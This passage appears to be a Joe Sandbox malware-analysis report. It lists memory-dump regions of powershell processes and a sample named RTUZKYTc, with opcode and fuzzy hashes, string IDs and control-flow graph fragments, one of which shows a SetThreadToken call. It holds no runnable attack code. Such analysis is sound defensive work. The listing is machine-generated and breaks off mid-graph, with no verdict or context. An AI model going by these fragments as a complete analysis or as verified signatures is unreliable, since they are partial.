                                • Instruction ID: 20a4b6f5d31b7b9dacceed512a4d4deb4127a5aee55cfac887ee8e2f2a52aae9
                                • Opcode Fuzzy Hash: 22e9efcfc201ca510467cc12c5a0b16d517ac9191216e245d05ea263027c2a89
                                • Instruction Fuzzy Hash: 50B1A374E002099FDB55DFA9D980A9DFBF6FF48304F20862AD819AB314DB34A905CF90
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 060cf1d9bf6ea54c31f34fe810e054bde73b2e0d527787d0eab241a932d59801
                                • Instruction ID: 2776d8880e20fef90a9755e3492f9659cb7bced6e9875d4fabcbff12ce455865
                                • Opcode Fuzzy Hash: 060cf1d9bf6ea54c31f34fe810e054bde73b2e0d527787d0eab241a932d59801
                                • Instruction Fuzzy Hash: E3B19474E002199FDB54DFA9D991A9DFBF6FF48304F20862AD819AB314DB34A905CF90
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 3f57356262512ef5b799a71154ce1c8b70a0f2c5c46bf6c073b3de8c01699d19
                                • Instruction ID: db26dbcd2f1f0214328ce8bab5fa6abb3eaccf0aaebb1ddbffb2b8923debeb2b
                                • Opcode Fuzzy Hash: 3f57356262512ef5b799a71154ce1c8b70a0f2c5c46bf6c073b3de8c01699d19
                                • Instruction Fuzzy Hash: A8817174E012199FDB44DFA9D990A9DFBF6FF48304F20822AD819AB314E734A915CF90
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: f169bd2233c56fb1ea46da6b3ab415bf21455ca990ff2b990746d2a5a31e1c0f
                                • Instruction ID: 6ae017b6efc70e3f875441f251e0b5ade5192e01e4506f39e7d0db7c80ef7278
                                • Opcode Fuzzy Hash: f169bd2233c56fb1ea46da6b3ab415bf21455ca990ff2b990746d2a5a31e1c0f
                                • Instruction Fuzzy Hash: AF218EB17603059FDB34957E69817277BD69BC0715F30842EE805CB382DD35E551C360
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: 906a2a89951030ce4f9047d255a0431de2e6b4b096e90d8119939c24de22a56e
                                • Instruction ID: fdaa9c3ae8bfe7902ee6db4063a4f8a0ac36d4588eb8a91496d5402e550092e9
                                • Opcode Fuzzy Hash: 906a2a89951030ce4f9047d255a0431de2e6b4b096e90d8119939c24de22a56e
                                • Instruction Fuzzy Hash: 8B01F26130D3968FC72B532C1D6016A6FB65F8396072E05DBC481DF393C9288D4A83E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: dbbd9f5f2d05521aeec6df830a8ad73cb4a43530cf70d98402cb75a2d2fc76ca
                                • Instruction ID: 465d05e9cfdd1580435825fac527314f7cbe8f2e5ddf889e76efed57025a028e
                                • Opcode Fuzzy Hash: dbbd9f5f2d05521aeec6df830a8ad73cb4a43530cf70d98402cb75a2d2fc76ca
                                • Instruction Fuzzy Hash: 00F1B0347002058FDB5AAB75E858B6E7BA7FF88704F148528E50ADB3A9DF759C01CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 2098570656fa0c1c389553bde11163929c8354fdd3a2cb46c37dd6626c9b18cf
                                • Instruction ID: e15090fc71661e0d5664eaacd71ad543d7a62781722ffd55c63681515835c234
                                • Opcode Fuzzy Hash: 2098570656fa0c1c389553bde11163929c8354fdd3a2cb46c37dd6626c9b18cf
                                • Instruction Fuzzy Hash: B7C1A034700205CFDB5AAB74E858B6E77A7BF88704F148528D50ADB3A9DF799C06CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 4452823951a6a70804b4bd1cb9a62ac7613c1625e0363c226082492843018442
                                • Instruction ID: 5a643c1ab00a4fe21cdee8bca768adfc5b22938726860a0473e20f24a845ae62
                                • Opcode Fuzzy Hash: 4452823951a6a70804b4bd1cb9a62ac7613c1625e0363c226082492843018442
                                • Instruction Fuzzy Hash: 89A1A234700201CFDB59AB75D95876E76A7BF88704F148528E90EDB399DF399C02CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: ad77e61d1655bae8eaa2a8fd64376057d2c99e62c76f1f9334bbf5f5957abea9
                                • Instruction ID: 3858b2b69e668d864eb81d6c40f08e52eac3932bb40faf06b460f6a893a0fdb4
                                • Opcode Fuzzy Hash: ad77e61d1655bae8eaa2a8fd64376057d2c99e62c76f1f9334bbf5f5957abea9
                                • Instruction Fuzzy Hash: FF212330B102159FCB99EB78885467E7BF3AFC9204F14846DD149DB39AEE349D028792
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: b7202e3e8cbae789bc590619d0a6cc3b83688a2087895dccbe51fb11e98295df
                                • Instruction ID: bd2f86d87d251abb7193de0e4be48ffea8bd667fa75404d6ecfedd437466d610
                                • Opcode Fuzzy Hash: b7202e3e8cbae789bc590619d0a6cc3b83688a2087895dccbe51fb11e98295df
                                • Instruction Fuzzy Hash: B821F830B102158FCB59EB78C55463E7BF6AFC8204B14846DD149DB39AEE34DC02C792
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 0d10292f09b2dcdb60814abda5c0ce8887d1362917fa5d3f2533c0a83e6f3502
                                • Instruction ID: 75c635a0fcc46fddd888497249160adc2088c26385fff29e3db012ff73f679dc
                                • Opcode Fuzzy Hash: 0d10292f09b2dcdb60814abda5c0ce8887d1362917fa5d3f2533c0a83e6f3502
                                • Instruction Fuzzy Hash: C621C630A052089FCB48EFB8D5997AE7FF6AB45300F1044A9D905DB28AEF349D05CB81
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 627732dc1eb79de806159ee86ecad3a9a948d648ac17df504e672c6748aacfcf
                                • Instruction ID: 93d21c49ff6c63d69a318b630476f3c233e5b37b2f97dd522714305e56633677
                                • Opcode Fuzzy Hash: 627732dc1eb79de806159ee86ecad3a9a948d648ac17df504e672c6748aacfcf
                                • Instruction Fuzzy Hash: A731893091A3959FCB07EF78E96099D7FB0FF46208B0141EBC449DB2A7E6341A49CB51
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9b028ac4f377f628dbd4d5645ff461604d164a4db249d1551dc2cddd9bab665
                                • Instruction ID: 0df4b7e77aaf14798748cb3afa8e713b155281fa3d355233dd37792fc4269a23
                                • Opcode Fuzzy Hash: a9b028ac4f377f628dbd4d5645ff461604d164a4db249d1551dc2cddd9bab665
                                • Instruction Fuzzy Hash: 7221A471B043055FCB48AFBE585436EBEEEEFC9240B15482DD55AC3396DE384C0687A1
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb0053d81c53433b01b2209d6b984def91fcee1a3f1da094d0cbabd33e584e57
                                • Instruction ID: dd25708a8e3a5e65878bd29e25783d36c4a58cb93c380361307cc4b44e3ac5e0
                                • Opcode Fuzzy Hash: cb0053d81c53433b01b2209d6b984def91fcee1a3f1da094d0cbabd33e584e57
                                • Instruction Fuzzy Hash: 96219C74900209DFCB45FFB8E944BADBBBAFF84300F108969D401E7258EB34AA45CB41
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9be872fb1a6ec4da42fbe8d65c8ea8d2004a001cbd3e5d3b564321414039e15f
                                • Instruction ID: 7c1012984c53e6cc838cdb9c99e90537f93f1d1a041436677d052d63b2a27010
                                • Opcode Fuzzy Hash: 9be872fb1a6ec4da42fbe8d65c8ea8d2004a001cbd3e5d3b564321414039e15f
                                • Instruction Fuzzy Hash: 22216974A00209DFCB45FFB8E944AADBBBAFF84304F108969D405E7258EB34AA45CF51
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6e5f777a39c43651ca24a4a7677a810accde02fd6f91b0d1613365fc62fd58c
                                • Instruction ID: 406ebc75abe56c8e810ed5cdfc0b873e870c80f2db806b440ee4bc18e90a5a14
                                • Opcode Fuzzy Hash: a6e5f777a39c43651ca24a4a7677a810accde02fd6f91b0d1613365fc62fd58c
                                • Instruction Fuzzy Hash: F811B3342452869FCB46FF68F984F553BBEEF45204B149AA49008CB22ED774AD4ACF81
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9300cee4cbf5341370edb38a67e24ad65d44f0f736b587055ebdb3f17cffdbec
                                • Instruction ID: 808a2f583bc958b148a69d55c67ad67854f586f6e9dbbbb182c5d6eed52d00e8
                                • Opcode Fuzzy Hash: 9300cee4cbf5341370edb38a67e24ad65d44f0f736b587055ebdb3f17cffdbec
                                • Instruction Fuzzy Hash: E111FA74E1020AEFCF49FFA8E94499DBBB5FF44208B104669C41AE7266EB716E45CF40
                                Memory Dump Source
                                • Source File: 00000010.00000002.2175960178.0000000002AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2af0000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44012cc9f43e18742fc0a0f7efd5df57064442502c91c236222872dba5b8b767
                                • Instruction ID: 07948bc95837d46c05446d216c8821075640dccfdac4c0aff7b96562135123b6
                                • Opcode Fuzzy Hash: 44012cc9f43e18742fc0a0f7efd5df57064442502c91c236222872dba5b8b767
                                • Instruction Fuzzy Hash: B701953465024A9FCB46FF28FA84F5977AEFF44305B109A649008CB22DD774AD49CF81

                                Execution Graph

                                Execution Coverage: 5.9%
                                Dynamic/Decrypted Code Coverage: 0%
                                Signature Coverage: 0%
                                Total number of Nodes: 3
                                Total number of Limit Nodes: 0
                                execution_graph 22456 8e67860 22457 8e678a3 SetThreadToken 22456->22457 22458 8e678d1 22457->22458

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 620 4e7b470-4e7b4a9 622 4e7b4ae-4e7b7e9 call 4e7acbc 620->622 623 4e7b4ab 620->623 684 4e7b7ee-4e7b7f5 622->684 623->622
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c782253656201b92a1d1eb71737e2ecdb7253c2000f7504ed3b9ca147ffc08ff
                                • Instruction ID: 6dec7f145dd713532f6f4fe551d7f6f124278666ae11a24a599230c00ad4eb29
                                • Opcode Fuzzy Hash: c782253656201b92a1d1eb71737e2ecdb7253c2000f7504ed3b9ca147ffc08ff
                                • Instruction Fuzzy Hash: 4A915174A007155FEB19EFB584115AE7BF2EFC4704B01892DD14AAF344DF38A9068BDA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 685 4e7b490-4e7b4a9 686 4e7b4ae-4e7b7e9 call 4e7acbc 685->686 687 4e7b4ab 685->687 748 4e7b7ee-4e7b7f5 686->748 687->686
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74dd59f5d3f267711cb92ccf01cb11a6e500759fa30139ca64929552d0974da2
                                • Instruction ID: ef6a043f457bbcd13cbd9db7324f365ea4f2aca05aeb5a77e1515d5fcb49ec28
                                • Opcode Fuzzy Hash: 74dd59f5d3f267711cb92ccf01cb11a6e500759fa30139ca64929552d0974da2
                                • Instruction Fuzzy Hash: 97914274B007195BEB19EFB584115AE7AE2EFC4704B01C92DD14AAF344DF38A9068BDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$|,j
                                • API String ID: 0-1921836591
                                • Opcode ID: 26d787c73c11830c1033e35370a94299758c146be2ead643a309831dcf14771b
                                • Instruction ID: 5ca7a88e9988e078fc317435b814136d05a1a9fc41f983d76bc082012f4af12c
                                • Opcode Fuzzy Hash: 26d787c73c11830c1033e35370a94299758c146be2ead643a309831dcf14771b
                                • Instruction Fuzzy Hash: 0D2214B1B002069FEB24CB6885416EABBE6FF85211F14C0FEE905DB251DB35DD45CBA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 198 7bc3ce8-7bc3d0d 199 7bc3f00-7bc3f4a 198->199 200 7bc3d13-7bc3d18 198->200 210 7bc40ce-7bc4112 199->210 211 7bc3f50-7bc3f55 199->211 201 7bc3d1a-7bc3d20 200->201 202 7bc3d30-7bc3d34 200->202 204 7bc3d24-7bc3d2e 201->204 205 7bc3d22 201->205 206 7bc3d3a-7bc3d3c 202->206 207 7bc3eb0-7bc3eba 202->207 204->202 205->202 208 7bc3d4c 206->208 209 7bc3d3e-7bc3d4a 206->209 212 7bc3ebc-7bc3ec5 207->212 213 7bc3ec8-7bc3ece 207->213 214 7bc3d4e-7bc3d50 208->214 209->214 239 7bc4228-7bc4248 210->239 240 7bc4118-7bc411d 210->240 215 7bc3f6d-7bc3f71 211->215 216 7bc3f57-7bc3f5d 211->216 217 7bc3ed4-7bc3ee0 213->217 218 7bc3ed0-7bc3ed2 213->218 214->207 222 7bc3d56-7bc3d75 214->222 220 7bc3f77-7bc3f79 215->220 221 7bc4080-7bc408a 215->221 223 7bc3f5f 216->223 224 7bc3f61-7bc3f6b 216->224 226 7bc3ee2-7bc3efd 217->226 218->226 228 7bc3f89 220->228 229 7bc3f7b-7bc3f87 220->229 230 7bc408c-7bc4094 221->230 231 7bc4097-7bc409d 221->231 254 7bc3d85 222->254 255 7bc3d77-7bc3d83 222->255 223->215 224->215 233 7bc3f8b-7bc3f8d 228->233 229->233 234 7bc409f-7bc40a1 231->234 235 7bc40a3-7bc40af 231->235 233->221 241 7bc3f93-7bc3fb2 233->241 242 7bc40b1-7bc40cb 234->242 235->242 257 7bc426c-7bc4277 239->257 258 7bc424a-7bc425d 239->258 243 7bc411f-7bc4125 240->243 244 7bc4135-7bc4139 240->244 275 7bc3fb4-7bc3fc0 241->275 276 7bc3fc2 241->276 248 7bc4129-7bc4133 243->248 249 7bc4127 243->249 251 7bc413f-7bc4141 244->251 252 7bc41da-7bc41e4 244->252 248->244 249->244 259 7bc4151 251->259 260 7bc4143-7bc414f 251->260 261 7bc41e6-7bc41ee 252->261 262 7bc41f1-7bc41f7 252->262 263 7bc3d87-7bc3d89 254->263 255->263 286 7bc427f-7bc4281 257->286 265 7bc425f-7bc4277 258->265 266 7bc428b-7bc4295 258->266 267 7bc4153-7bc4155 259->267 260->267 269 7bc41fd-7bc4209 262->269 270 7bc41f9-7bc41fb 262->270 263->207 271 7bc3d8f-7bc3d96 263->271 265->286 279 7bc429f-7bc42a5 266->279 280 7bc4297-7bc429c 266->280 267->252 273 7bc415b-7bc415d 267->273 277 7bc420b-7bc4225 269->277 270->277 271->199 278 7bc3d9c-7bc3da1 271->278 284 7bc415f-7bc4165 273->284 285 7bc4177-7bc417e 273->285 287 7bc3fc4-7bc3fc6 275->287 276->287 289 7bc3db9-7bc3dc8 278->289 290 7bc3da3-7bc3da9 278->290 281 7bc42ab-7bc42b7 279->281 282 7bc42a7-7bc42a9 279->282 291 7bc42b9-7bc42d2 281->291 282->291 294 7bc4169-7bc4175 284->294 295 7bc4167 284->295 296 7bc4196-7bc41d7 285->296 297 7bc4180-7bc4186 285->297 292 7bc42d5-7bc42fe 286->292 293 7bc4283-7bc4288 286->293 287->221 298 7bc3fcc-7bc4003 287->298 289->207 309 7bc3dce-7bc3dec 289->309 299 7bc3dad-7bc3db7 290->299 300 7bc3dab 290->300 319 7bc432d-7bc435c 292->319 320 7bc4300-7bc4326 292->320 294->285 295->285 304 7bc4188 297->304 305 7bc418a-7bc4194 297->305 324 7bc401d-7bc4024 298->324 325 7bc4005-7bc400b 298->325 299->289 300->289 304->296 305->296 309->207 327 7bc3df2-7bc3e17 309->327 330 7bc435e-7bc437b 319->330 331 7bc4395-7bc439f 319->331 320->319 332 7bc403c-7bc407d 324->332 333 7bc4026-7bc402c 324->333 328 7bc400d 325->328 329 7bc400f-7bc401b 325->329 327->207 351 7bc3e1d-7bc3e24 327->351 328->324 329->324 345 7bc437d-7bc438f 330->345 346 7bc43e5-7bc43ea 330->346 337 7bc43a8-7bc43ae 331->337 338 7bc43a1-7bc43a5 331->338 335 7bc402e 333->335 336 7bc4030-7bc403a 333->336 335->332 336->332 343 7bc43b4-7bc43c0 337->343 344 7bc43b0-7bc43b2 337->344 348 7bc43c2-7bc43e2 343->348 344->348 345->331 346->345 352 7bc3e6a-7bc3e9d 351->352 353 7bc3e26-7bc3e41 351->353 366 7bc3ea4-7bc3ead 352->366 359 7bc3e5b-7bc3e5f 353->359 360 7bc3e43-7bc3e49 353->360 364 7bc3e66-7bc3e68 359->364 361 7bc3e4d-7bc3e59 360->361 362 7bc3e4b 360->362 361->359 362->359 364->366
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: 7a0ca232ef10e8921c32d4b300a532a1d062626704a1bde4cf27c8edab5763ca
                                • Instruction ID: 2ce2ff30c397bae5c9d4332be707acf6b4ba63f9064565e023380399d8cd8ebe
                                • Opcode Fuzzy Hash: 7a0ca232ef10e8921c32d4b300a532a1d062626704a1bde4cf27c8edab5763ca
                                • Instruction Fuzzy Hash: 4E1256F17042428FEB25DB6894217AABFE6DFC1310F14C4AED945DB251DB32CA45CBA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 371 8e67858-8e6789b 372 8e678a3-8e678cf SetThreadToken 371->372 373 8e678d1-8e678d7 372->373 374 8e678d8-8e678f5 372->374 373->374
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2209476678.0000000008E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_8e60000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 946051ad189179d1c662bc2782405b15bcf58b957c8d72ae005259cbddae027d
                                • Instruction ID: baca5ff13c0c2f2d01e75f56d0d9e86b62e45cafe97baf0119a6ea74fe879422
                                • Opcode Fuzzy Hash: 946051ad189179d1c662bc2782405b15bcf58b957c8d72ae005259cbddae027d
                                • Instruction Fuzzy Hash: 931116B59002498FCB10DF9EC545A9EFFF4EF48324F148459D559A7210C774A984CFA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 377 8e67860-8e678cf SetThreadToken 379 8e678d1-8e678d7 377->379 380 8e678d8-8e678f5 377->380 379->380
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2209476678.0000000008E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_8e60000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 6c90389f7510958a9068d1f916091669ebd29e952b41048f7e1e846b7b5a5225
                                • Instruction ID: 89c1148ed25b6c5b6c633cf4cb1fb5d1c5dac3947e7fc1d76085d8e359bdbf3c
                                • Opcode Fuzzy Hash: 6c90389f7510958a9068d1f916091669ebd29e952b41048f7e1e846b7b5a5225
                                • Instruction Fuzzy Hash: 1511F5B59002588FCB10DF9AC945B9EFBF8EB48324F148459D519A7250C778A944CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 383 4e76fc8-4e76fe7 384 4e770ed-4e7712b 383->384 385 4e76fed-4e76ff0 383->385 412 4e76ff2 call 4e77664 385->412 413 4e76ff2 call 4e7767f 385->413 387 4e76ff8-4e7700a 388 4e77016-4e7702b 387->388 389 4e7700c 387->389 395 4e770b6-4e770cf 388->395 396 4e77031-4e77041 388->396 389->388 401 4e770d1 395->401 402 4e770da 395->402 397 4e77043 396->397 398 4e7704d-4e7705b call 4e7bf10 396->398 397->398 404 4e77061-4e77065 398->404 401->402 402->384 405 4e77067-4e77077 404->405 406 4e770a5-4e770b0 404->406 407 4e77093-4e7709d 405->407 408 4e77079-4e77091 405->408 406->395 406->396 407->406 408->406 412->387 413->387
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: 6a13f350f02fa86faeb23cf19c8a043ea17a6574302e2814cd664a94142d54f5
                                • Instruction ID: 8c2f5431561446494c8c6f0b9d6ad55424490cc27cf77dfa192d668f9afefd30
                                • Opcode Fuzzy Hash: 6a13f350f02fa86faeb23cf19c8a043ea17a6574302e2814cd664a94142d54f5
                                • Instruction Fuzzy Hash: 86415E34B042058FDB04DFA8C554AAEBBF1EF8D715F145499E802EB395DA35EC01CB61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 414 4e7af98-4e7af9f 415 4e7afa6-4e7afaa 414->415 416 4e7afa1 call 4e7a984 414->416 417 4e7afac-4e7afb9 415->417 418 4e7afba-4e7b055 415->418 416->415 424 4e7b057-4e7b05d 418->424 425 4e7b05e-4e7b07b 418->425 424->425
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: 2a71d424101bb5691ea1c3833f6c16ce4a5a3470a99a078a9a5d0714c4265642
                                • Instruction ID: 3ea99ab8120d22be29736b04566f65a89834b7a921c1017c364cb50667c26a26
                                • Opcode Fuzzy Hash: 2a71d424101bb5691ea1c3833f6c16ce4a5a3470a99a078a9a5d0714c4265642
                                • Instruction Fuzzy Hash: 4521B271A042588FCB14DFAED404AAFBFF5EF89320F14846AD508E7340CA75A845CBE5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 523 7bc17b8-7bc17da 524 7bc1969-7bc19b5 523->524 525 7bc17e0-7bc17e5 523->525 533 7bc19bb-7bc19c0 524->533 534 7bc1b04-7bc1b34 524->534 526 7bc17fd-7bc1801 525->526 527 7bc17e7-7bc17ed 525->527 531 7bc1914-7bc191e 526->531 532 7bc1807-7bc180b 526->532 529 7bc17ef 527->529 530 7bc17f1-7bc17fb 527->530 529->526 530->526 535 7bc192c-7bc1932 531->535 536 7bc1920-7bc1929 531->536 537 7bc180d-7bc181e 532->537 538 7bc184b 532->538 539 7bc19d8-7bc19dc 533->539 540 7bc19c2-7bc19c8 533->540 560 7bc1b44 534->560 561 7bc1b36-7bc1b42 534->561 543 7bc1938-7bc1944 535->543 544 7bc1934-7bc1936 535->544 537->524 555 7bc1824-7bc1829 537->555 541 7bc184d-7bc184f 538->541 551 7bc1ab4-7bc1abe 539->551 552 7bc19e2-7bc19e4 539->552 546 7bc19cc-7bc19d6 540->546 547 7bc19ca 540->547 541->531 548 7bc1855-7bc1859 541->548 549 7bc1946-7bc1966 543->549 544->549 546->539 547->539 548->531 558 7bc185f-7bc1863 548->558 556 7bc1acc-7bc1ad2 551->556 557 7bc1ac0-7bc1ac9 551->557 553 7bc19f4 552->553 554 7bc19e6-7bc19f2 552->554 563 7bc19f6-7bc19f8 553->563 554->563 564 7bc182b-7bc1831 555->564 565 7bc1841-7bc1849 555->565 567 7bc1ad8-7bc1ae4 556->567 568 7bc1ad4-7bc1ad6 556->568 569 7bc1865-7bc186e 558->569 570 7bc1886 558->570 562 7bc1b46-7bc1b48 560->562 561->562 572 7bc1b7c-7bc1b86 562->572 573 7bc1b4a-7bc1b50 562->573 563->551 574 7bc19fe-7bc1a16 563->574 575 7bc1835-7bc183f 564->575 576 7bc1833 564->576 565->541 578 7bc1ae6-7bc1b01 567->578 568->578 579 7bc1875-7bc1882 569->579 580 7bc1870-7bc1873 569->580 577 